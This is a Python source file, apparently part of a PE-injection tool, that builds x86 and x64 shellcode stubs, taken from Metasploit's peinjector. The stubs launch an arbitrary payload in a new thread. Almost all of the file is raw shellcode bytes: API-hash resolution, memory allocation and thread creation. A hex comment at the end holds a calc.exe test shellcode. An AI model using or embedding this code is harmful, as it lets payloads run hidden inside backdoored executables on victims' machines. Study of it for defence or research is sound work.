shellcode_thread.py

def add_thread_x86(payload: bytes) -> bytes:
    """
    This function adds a shellcode to starts a x86 shellcode in a thread.

    https://github.com/rapid7/metasploit-framework/blob/03dc2317da8dc18a47e9c144910844139324aa9c/lib/rex/post/meterpreter/extensions/peinjector/peinjector.rb#L50
    """

    stackpreserve = b"\x90\x90\x60\x9c"

    thread = (
        b"\xFC\x90\xE8\xC1\x00\x00\x00\x60\x89\xE5\x31\xD2\x90\x64\x8B"
        + b"\x52\x30\x8B\x52\x0C\x8B\x52\x14\xEB\x02"
        + b"\x41\x10\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0\xAC\x3C\x61"
        + b"\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\x49\x75\xEF\x52\x90\x57\x8B"
        + b"\x52\x10\x90\x8B\x42\x3C\x01\xD0\x90\x8B\x40\x78\xEB\x07\xEA\x48"
        + b"\x42\x04\x85\x7C\x3A\x85\xC0\x0F\x84\x68\x00\x00\x00\x90\x01\xD0"
        + b"\x50\x90\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x58\x49\x8B\x34\x8B"
        + b"\x01\xD6\x31\xFF\x90\x31\xC0\xEB\x04\xFF\x69\xD5\x38\xAC\xC1\xCF"
        + b"\x0D\x01\xC7\x38\xE0\xEB\x05\x7F\x1B\xD2\xEB\xCA\x75\xE6\x03\x7D"
        + b"\xF8\x3B\x7D\x24\x75\xD4\x58\x90\x8B\x58\x24\x01\xD3\x90\x66\x8B"
        + b"\x0C\x4B\x8B\x58\x1C\x01\xD3\x90\xEB\x04\xCD\x97\xF1\xB1\x8B\x04"
        + b"\x8B\x01\xD0\x90\x89\x44\x24\x24\x5B\x5B\x61\x90\x59\x5A\x51\xEB"
        + b"\x01\x0F\xFF\xE0\x58\x90\x5F\x5A\x8B\x12\xE9\x53\xFF\xFF\xFF\x90"
        + b"\x5D\x90\xBE"
    ) + len(payload).to_bytes(4, "little")
    shellcode = b"\xE8\xB7\xFF\xFF\xFF" + payload

    thread += (
        b"\x90\x6A\x40\x90\x68\x00\x10\x00\x00"
        + b"\x56\x90\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x89\xC3\x89\xC7\x90"
        + b"\x89\xF1\xeb\x44\x90\x5e\x90\x90\x90\xF2\xA4\xE8\x20\x00\x00"
        + b"\x00\xBB\xE0\x1D\x2A\x0A\x90\x68\xA6\x95\xBD\x9D\xFF\xD5\x3C\x06"
        + b"\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F\x6A\x00\x53\xFF"
        + b"\xD5\x31\xC0\x50\x50\x50\x53\x50\x50\x68\x38\x68\x0D\x16\xFF\xD5"
        + b"\x58\x58\x90\x61\xe9"
    ) + len(shellcode).to_bytes(4, "little")

    return stackpreserve + thread + shellcode


def add_thread_x64(payload: bytes) -> bytes:
    """
    This function adds a shellcode to starts a x86 shellcode in a thread.

    https://github.com/rapid7/metasploit-framework/blob/03dc2317da8dc18a47e9c144910844139324aa9c/lib/rex/post/meterpreter/extensions/peinjector/peinjector.rb#L95
    """

    stackpreserve = (
        b"\x90\x50\x53\x51\x52\x56\x57\x55\x41\x50"
        + b"\x41\x51\x41\x52\x41\x53\x41\x54\x41\x55\x41\x56\x41\x57\x9c"
    )
    payload_length = len(payload).to_bytes(4, "little")

    thread = (
        b"\x90\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31"
        + b"\xD2\x65\x48\x8B\x52\x60\x48\x8B\x52\x18\x48\x8B\x52\x20\x48"
        + b"\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac"
        + b"\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed"
        + b"\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80"
        + b"\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48"
        + b"\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b"
        + b"\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9"
        + b"\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39"
        + b"\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
        + b"\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0"
        + b"\x41\x58\x41\x58\x5E\x59\x5A\x41\x58\x41\x59\x41\x5A\x48\x83"
        + b"\xEC\x20\x41\x52\xFF\xE0\x58\x41\x59\x5A\x48\x8B\x12\xe9\x57"
        + b"\xff\xff\xff\x5d\x49\xc7\xc6"
    ) + payload_length
    shellcode = b"\xE8\xB8\xFF\xFF\xFF" + payload

    thread += (
        b"\x6a\x40\x41\x59\x68\x00\x10\x00\x00\x41\x58\x4C\x89\xF2\x6A"
        + b"\x00\x59\x68\x58\xa4\x53\xe5\x41\x5A\xff\xd5\x48\x89\xc3\x48"
        + b"\x89\xc7\x48\xc7\xc1"
    ) + payload_length

    thread += (
        b"\xeb\x43\x5e\xf2\xa4\xe8\x00\x00\x00\x00\x48\x31\xC0\x50\x50"
        + b"\x49\x89\xC1\x48\x89\xC2\x49\x89\xD8\x48\x89\xC1\x49\xC7\xC2"
        + b"\x38\x68\x0D\x16\xFF\xD5\x48\x83\xC4\x58\x9d\x41\x5f\x41\x5e"
        b"\x41\x5d\x41\x5c\x41\x5b\x41\x5a\x41\x59\x41\x58\x5d\x5c\x5f"
        b"\x5e\x5a\x59\x5b\x58\xe9"
    ) + len(shellcode).to_bytes(4, "little")

    return stackpreserve + thread + shellcode


# fc4883e4f0e8c0000000415141505251564831d265488b5260488b5218488b5220488b7250480fb74a4a4d31c94831c0ac3c617c022c2041c1c90d4101c1e2ed524151488b52208b423c4801d08b80880000004885c074674801d0508b4818448b40204901d0e35648ffc9418b34884801d64d31c94831c0ac41c1c90d4101c138e075f14c034c24084539d175d858448b40244901d066418b0c48448b401c4901d0418b04884801d0415841585e595a41584159415a4883ec204152ffe05841595a488b12e957ffffff5d48ba0100000000000000488d8d0101000041ba318b6f87ffd5bbe01d2a0a41baa695bd9dffd54883c4283c067c0a80fbe07505bb4713726f6a00594189daffd563616c632e65786500